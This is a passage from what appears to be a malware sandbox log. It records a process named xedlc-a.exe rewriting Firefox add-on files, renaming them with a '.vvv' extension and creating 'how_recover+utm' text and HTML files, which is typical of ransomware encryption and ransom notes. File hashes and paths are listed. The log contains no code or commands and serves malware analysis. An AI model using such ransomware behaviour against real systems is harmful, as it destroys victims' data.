51485.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js.vvv
51486.            ads:
51487.          fid (ads:): 281474976765912
51488.          ntstatus: 0x0
51489.          CreateOptions: 0x0
51490.        file:
51491.          timestamp: 75073
51492.          mode: open
51493.          sequenceNumber: 1072
51494.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
51495.          filesize: 4101
51496.          processinfo:
51497.            pid: 1056
51498.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51499.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51500.            ads:
51501.          fid (ads:): 562949953476277
51502.          ntstatus: 0x0
51503.          CreateOptions: 0x60
51504.        file:
51505.          timestamp: 75172
51506.          mode: close
51507.          sequenceNumber: 1073
51508.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
51509.          filesize: 4526
51510.          md5sum: 6178770a828bfca00956dc8608a99ca6
51511.          sha1sum: b10a4fed6d4cbdc217851c919ab8f2b459c5bc38
51512.          processinfo:
51513.            pid: 1056
51514.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51516.            ads:
51517.          fid (ads:): 562949953476277
51518.          ntstatus: 0x0
51519.          CreateOptions: 0x0
51520.        file:
51521.          timestamp: 75185
51522.          mode: rename
51523.          sequenceNumber: 1074
51524.          filesize: 4526
51525.          md5sum: 6178770a828bfca00956dc8608a99ca6
51526.          sha1sum: b10a4fed6d4cbdc217851c919ab8f2b459c5bc38
51527.          processinfo:
51528.            pid: 1056
51529.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51530.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51531.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
51532.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js.vvv
51533.            ads:
51534.          fid (ads:): 562949953476277
51535.          ntstatus: 0x0
51536.          CreateOptions: 0x0
51537.        file:
51538.          timestamp: 75235
51539.          mode: open
51540.          sequenceNumber: 1075
51541.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
51542.          filesize: 10453
51543.          processinfo:
51544.            pid: 1056
51545.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51547.            ads:
51548.          fid (ads:): 562949953476248
51549.          ntstatus: 0x0
51550.          CreateOptions: 0x60
51551.        file:
51552.          timestamp: 75297
51553.          mode: close
51554.          sequenceNumber: 1076
51555.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
51556.          filesize: 10878
51557.          md5sum: 8b6dd9b2c524beb003a1d941fba7ecaa
51558.          sha1sum: f304c1ab79ac7b89e9e179a9d9b31532fc6f12fe
51559.          processinfo:
51560.            pid: 1056
51561.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51562.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51563.            ads:
51564.          fid (ads:): 562949953476248
51565.          ntstatus: 0x0
51566.          CreateOptions: 0x0
51567.        file:
51568.          timestamp: 75310
51569.          mode: rename
51570.          sequenceNumber: 1077
51571.          filesize: 10878
51572.          md5sum: 8b6dd9b2c524beb003a1d941fba7ecaa
51573.          sha1sum: f304c1ab79ac7b89e9e179a9d9b31532fc6f12fe
51574.          processinfo:
51575.            pid: 1056
51576.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51577.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51578.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
51579.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js.vvv
51580.            ads:
51581.          fid (ads:): 562949953476248
51582.          ntstatus: 0x0
51583.          CreateOptions: 0x0
51584.        file:
51585.          timestamp: 75321
51586.          mode: open
51587.          sequenceNumber: 1078
51588.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
51589.          filesize: 12316
51590.          processinfo:
51591.            pid: 1056
51592.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51594.            ads:
51595.          fid (ads:): 562949953476244
51596.          ntstatus: 0x0
51597.          CreateOptions: 0x60
51598.        file:
51599.          timestamp: 75379
51600.          mode: close
51601.          sequenceNumber: 1079
51602.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
51603.          filesize: 12734
51604.          md5sum: 16d08ca5061b1a16ec005c4f0bc5e816
51605.          sha1sum: 022b52698aeb72c3e1f610d3ac34ce0b36a1d5b5
51606.          processinfo:
51607.            pid: 1056
51608.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51610.            ads:
51611.          fid (ads:): 562949953476244
51612.          ntstatus: 0x0
51613.          CreateOptions: 0x0
51614.        file:
51615.          timestamp: 75392
51616.          mode: rename
51617.          sequenceNumber: 1080
51618.          filesize: 12734
51619.          md5sum: 16d08ca5061b1a16ec005c4f0bc5e816
51620.          sha1sum: 022b52698aeb72c3e1f610d3ac34ce0b36a1d5b5
51621.          processinfo:
51622.            pid: 1056
51623.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51624.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51625.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
51626.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js.vvv
51627.            ads:
51628.          fid (ads:): 562949953476244
51629.          ntstatus: 0x0
51630.          CreateOptions: 0x0
51631.        file:
51632.          timestamp: 75404
51633.          mode: open
51634.          sequenceNumber: 1081
51635.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
51636.          filesize: 8614
51637.          processinfo:
51638.            pid: 1056
51639.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51640.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51641.            ads:
51642.          fid (ads:): 281474976765867
51643.          ntstatus: 0x0
51644.          CreateOptions: 0x60
51645.        file:
51646.          timestamp: 75442
51647.          mode: close
51648.          sequenceNumber: 1082
51649.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
51650.          filesize: 9038
51651.          md5sum: efed7f80c4d7cce1b13ebded19ff6fed
51652.          sha1sum: 2b1ccd3f8af252ad87ebace8f63b4c21d3f0711d
51653.          processinfo:
51654.            pid: 1056
51655.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51656.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51657.            ads:
51658.          fid (ads:): 281474976765867
51659.          ntstatus: 0x0
51660.          CreateOptions: 0x0
51661.        file:
51662.          timestamp: 75457
51663.          mode: rename
51664.          sequenceNumber: 1083
51665.          filesize: 9038
51666.          md5sum: efed7f80c4d7cce1b13ebded19ff6fed
51667.          sha1sum: 2b1ccd3f8af252ad87ebace8f63b4c21d3f0711d
51668.          processinfo:
51669.            pid: 1056
51670.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51672.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
51673.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js.vvv
51674.            ads:
51675.          fid (ads:): 281474976765867
51676.          ntstatus: 0x0
51677.          CreateOptions: 0x0
51678.        file:
51679.          timestamp: 75469
51680.          mode: open
51681.          sequenceNumber: 1084
51682.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
51683.          filesize: 2723
51684.          processinfo:
51685.            pid: 1056
51686.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51688.            ads:
51689.          fid (ads:): 281474976765865
51690.          ntstatus: 0x0
51691.          CreateOptions: 0x60
51692.        file:
51693.          timestamp: 75545
51694.          mode: close
51695.          sequenceNumber: 1085
51696.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
51697.          filesize: 3150
51698.          md5sum: fe585b6dc42dd7f80259fa49f67d3c4e
51699.          sha1sum: 168e8e8bcaddc9785d01d016210290b344fd75f7
51700.          processinfo:
51701.            pid: 1056
51702.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51703.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51704.            ads:
51705.          fid (ads:): 281474976765865
51706.          ntstatus: 0x0
51707.          CreateOptions: 0x0
51708.        file:
51709.          timestamp: 75561
51710.          mode: rename
51711.          sequenceNumber: 1086
51712.          filesize: 3150
51713.          md5sum: fe585b6dc42dd7f80259fa49f67d3c4e
51714.          sha1sum: 168e8e8bcaddc9785d01d016210290b344fd75f7
51715.          processinfo:
51716.            pid: 1056
51717.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51718.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51719.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
51720.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js.vvv
51721.            ads:
51722.          fid (ads:): 281474976765865
51723.          ntstatus: 0x0
51724.          CreateOptions: 0x0
51725.        file:
51726.          timestamp: 75572
51727.          mode: open
51728.          sequenceNumber: 1087
51729.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
51730.          filesize: 1821
51731.          processinfo:
51732.            pid: 1056
51733.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51734.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51735.            ads:
51736.          fid (ads:): 562949953476256
51737.          ntstatus: 0x0
51738.          CreateOptions: 0x60
51739.        file:
51740.          timestamp: 75604
51741.          mode: close
51742.          sequenceNumber: 1088
51743.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
51744.          filesize: 2238
51745.          md5sum: a45bdb270d97ee7e7267060c0096d8e6
51746.          sha1sum: 24e4972740229324d7cb46cdef937635bc574c5f
51747.          processinfo:
51748.            pid: 1056
51749.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51751.            ads:
51752.          fid (ads:): 562949953476256
51753.          ntstatus: 0x0
51754.          CreateOptions: 0x0
51755.        file:
51756.          timestamp: 75617
51757.          mode: rename
51758.          sequenceNumber: 1089
51759.          filesize: 2238
51760.          md5sum: a45bdb270d97ee7e7267060c0096d8e6
51761.          sha1sum: 24e4972740229324d7cb46cdef937635bc574c5f
51762.          processinfo:
51763.            pid: 1056
51764.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51766.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
51767.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js.vvv
51768.            ads:
51769.          fid (ads:): 562949953476256
51770.          ntstatus: 0x0
51771.          CreateOptions: 0x0
51772.        file:
51773.          timestamp: 75628
51774.          mode: open
51775.          sequenceNumber: 1090
51776.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
51777.          filesize: 29701
51778.          processinfo:
51779.            pid: 1056
51780.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51781.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51782.            ads:
51783.          fid (ads:): 562949953476246
51784.          ntstatus: 0x0
51785.          CreateOptions: 0x60
51786.        file:
51787.          timestamp: 75746
51788.          mode: close
51789.          sequenceNumber: 1091
51790.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
51791.          filesize: 30126
51792.          md5sum: 9bed38cef9faaec63d2f79e4cfedd3ab
51793.          sha1sum: 2cbc8860d7a673f3bbcd42f967cf2274a487d433
51794.          processinfo:
51795.            pid: 1056
51796.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51797.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51798.            ads:
51799.          fid (ads:): 562949953476246
51800.          ntstatus: 0x0
51801.          CreateOptions: 0x0
51802.        file:
51803.          timestamp: 75759
51804.          mode: rename
51805.          sequenceNumber: 1092
51806.          filesize: 30126
51807.          md5sum: 9bed38cef9faaec63d2f79e4cfedd3ab
51808.          sha1sum: 2cbc8860d7a673f3bbcd42f967cf2274a487d433
51809.          processinfo:
51810.            pid: 1056
51811.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51812.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51813.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
51814.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js.vvv
51815.            ads:
51816.          fid (ads:): 562949953476246
51817.          ntstatus: 0x0
51818.          CreateOptions: 0x0
51819.        file:
51820.          timestamp: 75770
51821.          mode: open
51822.          sequenceNumber: 1093
51823.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
51824.          filesize: 8643
51825.          processinfo:
51826.            pid: 1056
51827.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51828.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51829.            ads:
51830.          fid (ads:): 281474976765908
51831.          ntstatus: 0x0
51832.          CreateOptions: 0x60
51833.        file:
51834.          timestamp: 75861
51835.          mode: close
51836.          sequenceNumber: 1094
51837.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
51838.          filesize: 9070
51839.          md5sum: 204abd59621d913a45fe8833d689ee1f
51840.          sha1sum: 9633da02d317c1379725fc778c73f3ccb7cef200
51841.          processinfo:
51842.            pid: 1056
51843.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51844.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51845.            ads:
51846.          fid (ads:): 281474976765908
51847.          ntstatus: 0x0
51848.          CreateOptions: 0x0
51849.        file:
51850.          timestamp: 75873
51851.          mode: rename
51852.          sequenceNumber: 1095
51853.          filesize: 9070
51854.          md5sum: 204abd59621d913a45fe8833d689ee1f
51855.          sha1sum: 9633da02d317c1379725fc778c73f3ccb7cef200
51856.          processinfo:
51857.            pid: 1056
51858.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51860.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
51861.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js.vvv
51862.            ads:
51863.          fid (ads:): 281474976765908
51864.          ntstatus: 0x0
51865.          CreateOptions: 0x0
51866.        file:
51867.          timestamp: 75885
51868.          mode: created
51869.          sequenceNumber: 1096
51870.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.txt
51871.          processinfo:
51872.            pid: 1056
51873.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51874.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51875.            ads:
51876.          fid (ads:): 281474976778333
51877.          ntstatus: 0x0
51878.          CreateOptions: 0x60
51879.        file:
51880.          timestamp: 75892
51881.          mode: close
51882.          sequenceNumber: 1097
51883.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.txt
51884.          filesize: 2682
51885.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
51886.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
51887.          processinfo:
51888.            pid: 1056
51889.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51891.            ads:
51892.          fid (ads:): 281474976778333
51893.          ntstatus: 0x0
51894.          CreateOptions: 0x0
51895.        file:
51896.          timestamp: 75981
51897.          mode: created
51898.          sequenceNumber: 1098
51899.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.html
51900.          processinfo:
51901.            pid: 1056
51902.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51903.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51904.            ads:
51905.          fid (ads:): 281474976778334
51906.          ntstatus: 0x0
51907.          CreateOptions: 0x60
51908.        file:
51909.          timestamp: 75991
51910.          mode: close
51911.          sequenceNumber: 1099
51912.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.html
51913.          filesize: 9495
51914.          md5sum: 95f596a25dff51b6af2042b1bbe02985
51915.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
51916.          processinfo:
51917.            pid: 1056
51918.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51919.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51920.            ads:
51921.          fid (ads:): 281474976778334
51922.          ntstatus: 0x0
51923.          CreateOptions: 0x0
51924.        file:
51925.          timestamp: 76006
51926.          mode: open
51927.          sequenceNumber: 1100
51928.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
51929.          filesize: 6665
51930.          processinfo:
51931.            pid: 1056
51932.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51934.            ads:
51935.          fid (ads:): 281474976765916
51936.          ntstatus: 0x0
51937.          CreateOptions: 0x60
51938.        file:
51939.          timestamp: 76195
51940.          mode: close
51941.          sequenceNumber: 1101
51942.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
51943.          filesize: 7086
51944.          md5sum: 9e90c098aeea3b332757b2e06029c3fd
51945.          sha1sum: 7d1dbc75b2a7a913c9e4564ec97daef2032412b9
51946.          processinfo:
51947.            pid: 1056
51948.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51949.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51950.            ads:
51951.          fid (ads:): 281474976765916
51952.          ntstatus: 0x0
51953.          CreateOptions: 0x0
51954.        file:
51955.          timestamp: 76408
51956.          mode: rename
51957.          sequenceNumber: 1102
51958.          filesize: 7086
51959.          md5sum: 9e90c098aeea3b332757b2e06029c3fd
51960.          sha1sum: 7d1dbc75b2a7a913c9e4564ec97daef2032412b9
51961.          processinfo:
51962.            pid: 1056
51963.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51964.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51965.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
51966.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js.vvv
51967.            ads:
51968.          fid (ads:): 281474976765916
51969.          ntstatus: 0x0
51970.          CreateOptions: 0x0
51971.        file:
51972.          timestamp: 76421
51973.          mode: open
51974.          sequenceNumber: 1103
51975.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\test-content-symbiont.js
51976.          processinfo:
51977.            pid: 1056
51978.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51979.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51980.            ads:
51981.          fid (ads:): 281474976765906
51982.          ntstatus: 0x0
51983.          CreateOptions: 0x60
51984.        file:
51985.          timestamp: 76431
51986.          mode: created
51987.          sequenceNumber: 1104
51988.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.txt
51989.          processinfo:
51990.            pid: 1056
51991.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51992.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51993.            ads:
51994.          fid (ads:): 281474976778335
51995.          ntstatus: 0x0
51996.          CreateOptions: 0x60
51997.        file:
51998.          timestamp: 76441
51999.          mode: close
52000.          sequenceNumber: 1105
52001.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.txt
52002.          filesize: 2682
52003.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
52004.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
52005.          processinfo:
52006.            pid: 1056
52007.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52008.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52009.            ads:
52010.          fid (ads:): 281474976778335
52011.          ntstatus: 0x0
52012.          CreateOptions: 0x0
52013.        file:
52014.          timestamp: 76454
52015.          mode: created
52016.          sequenceNumber: 1106
52017.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.html
52018.          processinfo:
52019.            pid: 1056
52020.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52021.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52022.            ads:
52023.          fid (ads:): 281474976778336
52024.          ntstatus: 0x0
52025.          CreateOptions: 0x60
52026.        file:
52027.          timestamp: 76464
52028.          mode: close
52029.          sequenceNumber: 1107
52030.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.html
52031.          filesize: 9495
52032.          md5sum: 95f596a25dff51b6af2042b1bbe02985
52033.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
52034.          processinfo:
52035.            pid: 1056
